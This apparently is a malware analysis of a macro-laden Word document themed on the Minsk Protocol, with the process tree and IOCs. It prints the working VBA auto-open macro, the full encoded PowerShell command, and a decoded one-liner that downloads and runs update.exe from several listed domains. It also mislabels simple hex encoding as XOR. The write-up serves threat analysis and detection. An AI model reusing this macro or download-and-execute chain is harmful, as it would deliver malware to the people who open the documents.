https://analyze.intezer.com/analyses/1832abdc-0212-4f2b-97af-ec69af2e5a92/genetic-analysis

https://www.virustotal.com/gui/file/81c7eef54c852dd68050147f77f937933cbff1c22722617180ca386ef55918ab

SHA256:81c7eef54c852dd68050147f77f937933cbff1c22722617180ca386ef55918ab

Malicious Word document referencing Minsk Protocol.

Uses macros to download a second-stage payload from a server.

Process Tree

Uses WINWORD to open the file.

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" "C:\Users\<USER>\AppData\Local\Temp\<ANALYZED-FILE-NAME>.doc" /q

Runs PowerShell base64 encoded command (listed below in a VBA macro)

Child process from WINWORD launches splwow64

C:\Windows\splwow64.exe 12288

Details from the file

Using oleid, VBA macros are found.

Untitled

Next is to use olevba to get more information about the VBA and view the macro code

ThisDocument.cls 

Private Sub Document_Open()
    dywcrdwlcikn = UserForm1.TextBox1.Text
    Set dywcrdwlcikncfp = CreateObject(wfkdhzivnpjutwx("575363726970742e5368") & wfkdhzivnpjutwx("656c6c"))
    Set dcptzdqqwnzx = dywcrdwlcikncfp.Exec(dywcrdwlcikn)
End Sub

Function wfkdhzivnpjutwx(ByVal ankevzfzj As String) As String
Dim eolvlvdrsa As Long
For eolvlvdrsa = 1 To Len(ankevzfzj) Step 2
wfkdhzivnpjutwx = wfkdhzivnpjutwx & Chr$(Val("&H" & Mid$(ankevzfzj, eolvlvdrsa, 2)))
Next eolvlvdrsa
End Function

Untitled

575363726970742e5368 is an XOR encoded string. I can use xorsearch to find the memory location and string terminator (0x00) or CyberChef to decode the XOR string.

When decoded with the appended 656c6c, the output is WScript.Shell

UserForm1.frm 

Private Sub TextBox1_Change()

End Sub

Untitled

VBA Form String in UserForm1/o 

powershell.exe -w h -NonI -NoP -noL -enc LgAgACgAIAAkAFAAUwBIAG8ATQBlAFsANABdACsAJABwAFMASABvAG0ARQBbADMANABdACsAJwB4ACcAKQAgACgAIAAoACgAKAAiAHsAMQB9AHsAMwAzAH0AewAxADMAfQB7ADMAMgB9AHsAMwAwAH0AewA5AH0AewA3AH0AewAyADAAfQB7ADEANQB9AHsANQB9AHsAMgA0AH0AewAyADcAfQB7ADIAOQB9AHsAMQA4AH0AewA4AH0AewAzADQAfQB7ADIANQB9AHsAMgB9AHsAMQA3AH0AewAyADgAfQB7ADEAMQB9AHsAMQA2AH0AewAyADIAfQB7ADQAfQB7ADIAMwB9AHsANgB9AHsAMwAxAH0AewAyADEAfQB7ADAAfQB7ADMAfQB7ADIANgB9AHsAMQAyAH0AewAxADkAfQB7ADEAMAB9AHsAMQA0AH0AIgAtAGYAIAAnACsANQAxAG4AcAAxACwAeAA1ADEAbgArADUAMQBuAHAANQAxAG4AKwA1ADEAbgAxADUAMQBuACsANQAxAG4AdwBQAHIAZQBuADUAMQBuACsANQAxAG4AdgA6AHQANQAxAG4AKwA1ADEAbgBlAG0ANQAxAG4AKwA1ADEAbgBwAEMAJwAsACcAJgAgACgAKAB2ACcALAAnAGMAaABvAGkAZwAnACwAJwBOADUAMQBuACsANQAxAG4ASQB1ADUAMQBuACsANQAxAG4AcAA1ADEAbgArADUAMQBuAGQAYQB0ADUAMQBuACsANQAxAG4AZQAuAGUAeABlAHgAcAAxACkAOwBTAHQAYQA1ADEAbgArADUAMQBuAHIAdAA1ADEAbgArADUAMQBuAC0ANQAxAG4AKwA1ADEAbgBQAHIANQAxAG4AKwA1ADEAbgBvAGMAZQBzAHMAIAA1ADEAbgArADUAMQBuAC0ARgBpAGwAZQBwADUAMQBuACsANQAxAG4AYQB0AGgAIAA1ADEAbgArADUAMQBuAHgAcAAxAHcAUAByADUAMQBuACsANQAxAG4AZQBuAHYAOgB0AGUAbQBwAEMATgBJADUAMQAnACwAJwAxAG4AOgBDAHIAZQBhAHQAZQA1ADEAbgArADUAMQBuACgAeABwADEANQAxAG4AKwA1ADEAbgB3ADUAMQBuACsANQAxAG4AUAByAF8ALwBTAG8ANQAxACcALAAnADUAMQBuAC8ANQAxAG4AKwA1ADEAbgAvADUAMQBuACsANQAxAG4AdABhAGkAcwB1AG4AdwBpAG4ALgBjAGwAdQBiAHgAcAAxACwAeABwADUAMQBuACsANQAxAG4AMQBoAHQAdABwAHMAOgAvAC8ANQAxAG4AKwA1ADEAbgB3ACcALAAnAG4AZgB0AHcAYQByAGUAVQBwAGQAYQB0AGUALgBlAHgAZQA1ADEAbgArADUAMQBuAHgAcAA1ADEAbgArADUAMQBuADEAKQAuADUAMQBuACsANQAxAG4ARwBlADUAMQBuACsANQAxAG4AdABSAGUAcwBwAG8AbgBzADUAMQBuACsANQAxAG4AZQAnACwAJwAxAG4AKwA1ADEAbgB0ADUAMQBuACsANQAnACwAJwA4ADgANQAxAG4AKwA1ADEAbgAuADUAMQBuACsANQAxAG4AZgA1ADEAbgArADUAMQBuAHUAbgA1ADEAbgArADUAMQBuAHgAcAA1ADEAbgArADUAMQBuADEALAA1ACcALAAnADUAMQBuAHcAZQBiAC4AcwB1AG4AdgBuAC4AbgBlADUAJwAsACcAUgBlAHAATABhAGMARQAoADUAMQBuAEMATgBJADUAMQBuACwAWwBzAFQAcgBJAE4ARwBdAFsAYwBIAEEAcgAnACwAJwBaAEYAYQAlADUAMQBuACsANQAxAG4AewB3AFAAcgA1ADEAbgArADUAMQBuAGgAdAB0AHAAPQBbADUAMQBuACsANQAxAG4AUwB5ADUAMQBuACsANQAxAG4AcwA1ADEAbgArACcALAAnAF0AMQAyADQAKQAuAFIAZQBwAEwAYQBjAEUAKAA1ADEAbgB3AFAAcgA1ADEAJwAsACcAcgAqADUAMQBuACkALgBuAGEAbQBFAFsAMwAsADEAMQAsADIAXQAtAGoATwBJAG4ANQAxAG4ANQAxAG4AKQAgACgAIAAoADUAMQBuAHcAJwAsACcAXQA5ADIAKQAgACkAJwAsACcAdAA1ADEAbgArADUAMQBuAHQAcABzADoANQAxAG4AKwAnACwAJwA1ADEAbgB0AGUANQAxAG4AKwAnACwAJwBvADgAOAAuAHUAcwA1ADEAbgArADUAMQBuACcALAAnADUAMQBuACcALAAnAG4ALAA1ADEAbgBrADgAeAA1ADEAbgApAC4AUgBlAHAATABhAGMARQAoADUAMQBuAHgAcAAxADUAMQBuACwAWwBzAFQAcgBJAE4ARwBdAFsAYwBIAEEAcgBdADMANAApAC4AJwAsACcAMQBuAHgAcAA1ADEAbgArADUAMQBuADEALAA1ADEAbgArADUAMQBuAHgAcAAxAGgANQAxAG4AKwA1ADEAbgAnACwAJwAxAG4AKwA1ADEAbgAoAHcANQAxAG4AKwA1ADEAbgBQAHIAaAA1ADEAbgArADUAMQBuAHQAdABwADUAMQBuACsANQAxAG4ALgBDAG8ANQAxAG4AKwA1ADEAbgBuAHQAZQBuAHQATAA1ADEAbgArADUAMQBuAGUAbgBnAHQAaAAgAC0AbgBlADUAMQBuACsANQAxAG4AIAAtADEAKQA1ADEAbgArADUAMQBuAHsANQAxAG4AKwA1ADEAbgAoAE4AZQA1ADEAbgArADUAMQBuAHcALQA1ADEAbgArADUAMQBuAE8AYgBqAGUAYwB0ACAAUwA1ADEAbgArADUAMQBuAHkAcwB0AGUANQAxAG4AKwA1ADEAbgBtAC4ATgA1ADEAbgArADUAMQBuAGUAdAA1ADEAbgArADUAMQBuAC4AVwBlAGIANQAxAG4AKwA1ADEAbgBDADUAMQBuACsANQAxAG4AbAA1ADEAbgArADUAMQBuAGkAZQBuAHQANQAxAG4AKwA1ADEAbgApAC4ARABvAHcAbgA1ADEAbgArADUAMQBuAGwAbwBhAGQARgBpAGwAZQAoADUAMQBuACsANQAxAG4AeABwADEAdwA1ADEAbgArADUAMQBuAFAANQAxAG4AKwA1ADEAbgByADUAMQBuACsANQAxAG4AXwAvAHUAcABkADUAMQBuACsANQAxAG4AYQB0AGUALgBlAHgAZQB4ADUAMQBuACcALAAnADUAMQBuAG0ALgBOADUAMQBuACsANQAxAG4AZQB0ADUAMQBuACsANQAxAG4ALgBXAGUAYgA1ADEAbgArADUAMQBuAFIAZQBxAHUAZQA1ADEAbgArADUAMQBuAHMAdABdADoANQAxAG4AKwA1ACcALAAnAG4AKwA1ADEAJwAsACcAZQBiAC4AcwA1ADEAbgArADUAMQBuAHUAbgB3ADUAMQBuACsANQAxAG4AaQA1ADEAbgArADUAMQBuAG4AdgA1ADEAbgArADUAMQBuAG4ALgA1ADEAbgArADUAMQBuAHYAaQBwAHgANQAxAG4AKwA1ADEAbgBwADUAMQBuACsANQAxAG4AMQAsAHgANQAxAG4AKwA1ADEAbgBwADEAJwAsACcAKwA1ADEAbgBwADEANQAxAG4AKwA1ADEAbgBoAHQAdABwADUAMQBuACsANQAxAG4AcwA1ADEAbgArADUAMQBuADoALwAvACcALAAnAG4AKwA1ADEAbgB1AHAANQAxAG4AKwA1ADEAbgBkADUAMQBuACsANQAxAG4AYQB0AGUALgBlADUAMQBuACsANQAxAG4AeABlAHgAcAAxAH0ANQAxAG4AKwA1ADEAbgA7AHcANQAxAG4AKwA1ADEAbgBQAHIAaAA1ADEAbgArADUAMQBuAHQAdABwAC4AYwBsAG8AcwBlADUAMQBuACsANQAxAG4AKAApAH0ANQAxAG4AKQAuAFIAZQBwAEwAYQBjAEUAKAA1ADEAbgAxAFEARAA1ADEAbgAsAFsAcwBUAHIASQBOAEcAXQBbAGMASABBAHIAXQAzADkAKQAuAFIAZQBwAEwAYQBjAEUAKAA1ADEAbgBaAEYAYQA1ADEAbgAsAFsAcwBUAHIASQBOAEcAXQBbAGMASABBAHIAJwAsACcANQAxAG4AKwA1ADEAbgBoAHQANQAxAG4AKwA1ADEAbgAnACwAJwB4AHAAMQApACcALAAnAHQANQAxAG4AKwA1ADEAbgBwADUAMQBuACsANQAxAG4AOgAvAC8AYgAyADkALgA1ADEAbgArADUAMQBuAGIANQAxAG4AKwA1ADEAbgBlADUAMQBuACsANQAxAG4AdAB4ADUAMQBuACsANQAxAG4AcAAxADUAMQBuACsANQAxAG4ALAB4AHAAMQBoAHQAdABwADUAMQBuACsANQAxAG4AcwA6AC8ALwBwAGwAYQB5AGcANQAxAG4AKwA1ADEAbgBvADUAMQBuACsAJwAsACcAMQBuAEQANQAxAG4AKwA1ADEAbgBTAGkAbABlAG4AdABsAHkAQwA1ADEAbgArADUAMQBuAG8AbgB0AGkAbgA1ADEAbgArADUAMQBuAHUAZQAxADUAMQBuACsANQAxAG4AUQBEADsAQAAoAHgAcAA1ADEAbgArADUAMQBuADEANQAxAG4AKwA1ADEAbgBoADUAMQBuACsANQAxAG4AdAB0AHAAcwA1ADEAbgArADUAMQBuADoALwAvADUAMQBuACsAJwAsACcANQAxAG4AKwA1ADEAbgAoACkANQAxAG4AKwA1ADEAbgA7AGkANQAxAG4AKwA1ADEAbgBmADUAJwAsACcAUAByAEUAcgByADUAMQBuACsANQAxAG4AbwA1ADEAbgArADUAMQBuAHIAQQBjAHQAaQA1ADEAbgArADUAMQBuAG8AbgBQAHIANQAxAG4AKwA1ADEAbgBlAGYAZQByAGUAbgA1ADEAbgArADUAMQBuAGMANQAxAG4AKwA1ADEAbgBlAD0AMQBRADUAMQBuACsANQAnACwAJwBhAFIASQBBAGIAbABFACAANQAxAG4AKgBNAGQAJwAsACcAMQBuACsANQAxAG4AeAA1ADEAbgAnACkAKQAgACAALQBjAFIARQBQAGwAQQBDAGUAIAAnAGsAOAB4ACcALABbAEMAaABBAFIAXQAzADYALQBjAFIARQBQAGwAQQBDAGUAKABbAEMAaABBAFIAXQA1ADMAKwBbAEMAaABBAFIAXQA0ADkAKwBbAEMAaABBAFIAXQAxADEAMAApACwAWwBDAGgAQQBSAF0AMwA5ACkAKQA=

Untitled

Decoded output

$ErrorActionPreference='SilentlyContinue';@("https://web.sunvn.net","https://taisunwin.club","https://web.sunwinvn.vip","http://b29.bet","https://playgo88.fun","https://choigo88.us")|%{$http=[System.Net.WebRequest]::Create("$_/SoftwareUpdate.exe").GetResponse();if($http.ContentLength -ne -1){(New-Object System.Net.WebClient).DownloadFile("$_/update.exe","$env:temp\update.exe");Start-Process -Filepath "$env:temp\update.exe"};$http.close()}

Table including decoded hex strings

Untitled

IOCs

DNS Resolutions

kms8[.]msguides[.]com → 193[.]29[.]63[.]133

TCP Requests

193[.]29[.]63[.]133:1688

URLs

  • web.sunvn[.]net
  • playgo88[.]fun
  • web.sunwinvn[.]vip
  • taisunwin[.]club
  • choigo88[.]us